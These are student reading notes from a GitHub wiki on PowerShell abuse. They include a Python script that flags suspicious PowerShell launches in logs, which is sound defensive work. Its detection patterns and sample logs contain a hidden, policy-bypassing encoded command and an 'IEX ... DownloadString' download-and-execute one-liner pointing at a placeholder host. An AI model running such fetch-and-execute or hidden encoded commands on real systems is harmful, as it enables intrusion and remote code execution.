Ops 201 Reading 7 - marsecguy/reading-notes-cyberops GitHub Wiki

PowerShell

PowerShell is a powerful, object-based scripting environment. It is usually used by network administrators to manage their networks, and it can drive many back-end applications to automate processes. For example, it could gather data from a database on a schedule and feed that data into other programs, such as on-demand reports.

Because it is a scripting environment built into the shell, PowerShell is a prime tool for attackers to abuse. Once they have gained access, they do not need to download a program, which has a high likelihood of being detected by anti-malware. Instead, they can work directly in the shell and implant or write code straight into the existing automation processes. If the system already extracts data automatically and distributes it to other programs, administrators could easily miss one more destination added by the attacker.

This type of attack is on the rise and quickly accounts for a large share of the attacks conducted. Strategies must be in place to detect unauthorized use of PowerShell. Social engineering can also play a significant role in PowerShell attacks: opening an unknown file and accepting its macros can implant malicious code that runs through PowerShell, and lax physical security can give bad actors physical access to network clients or servers. This calls for a strong training plan for all employees, not just IT personnel.
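The paragraph above says detection strategies must be in place; the following is an added example (my own, not from the notes or the cited sources) of what such a check can look like. It scores constructed process-launch log lines for well-known PowerShell abuse indicators (encoded commands, hidden windows, execution-policy bypass, Invoke-Expression, web downloads) and decodes any `-EncodedCommand` argument so an analyst can see what was hidden. The `host=... user=... cmd=...` log format, the indicator weights and the alert threshold are all assumptions chosen for the example; the UTF-16LE base64 encoding used for `-EncodedCommand` is how PowerShell really expects that argument.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Assumed log shape: one process-launch record per line (constructed for this example).
LINE_RE = re.compile(r"^host=(\S+)\s+user=(\S+)\s+cmd=(.*)$")

# PowerShell takes -EncodedCommand as base64 of the UTF-16LE command text.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)

# Indicator name, pattern, weight. Weights are an assumption for this example;
# each indicator counts once per command line regardless of repetitions.
INDICATORS = [
    ("encoded_command", ENCODED_RE, 3),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("execpolicy_bypass", re.compile(r"-ex(?:ec|ecutionpolicy)?\s+bypass", re.I), 2),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    ("web_download", re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I), 2),
]
ALERT_THRESHOLD = 3  # assumption: a single encoded command, or two weaker indicators, alerts


@dataclass
class Finding:
    host: str
    user: str
    score: int = 0
    hits: List[str] = field(default_factory=list)
    decoded_command: Optional[str] = None

    @property
    def alert(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the plain text behind an -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None  # malformed payloads still count as a hit, just without a decode


def score_command(host: str, user: str, cmd: str) -> Finding:
    """Score one command line against the indicator table."""
    finding = Finding(host=host, user=user)
    for name, pattern, weight in INDICATORS:
        if pattern.search(cmd):
            finding.hits.append(name)
            finding.score += weight
    finding.decoded_command = decode_encoded_command(cmd)
    return finding


def analyze_logs(lines: List[str]) -> List[Finding]:
    """Parse every well-formed log line and return one Finding per line."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:  # lines that do not match the assumed format are skipped
            findings.append(score_command(*m.groups()))
    return findings


def _encode_ps(command: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (for the sample only)."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


# Constructed sample telemetry; the encoded payload is a harmless Write-Host.
ENCODED_SAMPLE = _encode_ps("Write-Host 'constructed sample'")
SAMPLE_LOGS = [
    "host=WS01 user=jdoe cmd=powershell.exe -NoProfile -File C:\\Scripts\\nightly-report.ps1",
    "host=WS02 user=svc_backup cmd=powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand " + ENCODED_SAMPLE,
    'host=WS03 user=jdoe cmd=powershell.exe -Command "Get-Process | Export-Csv C:\\Reports\\procs.csv"',
    'host=WS04 user=admin cmd=powershell.exe -c "IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/x\')"',
]

if __name__ == "__main__":
    for f in analyze_logs(SAMPLE_LOGS):
        flag = "ALERT" if f.alert else "ok   "
        print(f"{flag} {f.host:5} {f.user:11} score={f.score} hits={f.hits} decoded={f.decoded_command!r}")
```

The scheduled report script on WS01 and the interactive export on WS03 score zero, while the hidden, policy-bypassing encoded command on WS02 and the in-memory download on WS04 cross the threshold; the decoded text is what lets an analyst tell a benign encoded command from a planted one. In practice the same logic would run over Sysmon process-creation events or PowerShell script block logging (event 4104) rather than a constructed log format.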

Sources:

  • Tech Thoughts
  • The Register

Things I want to know more about

  • Do active antivirus programs operate primarily in RAM?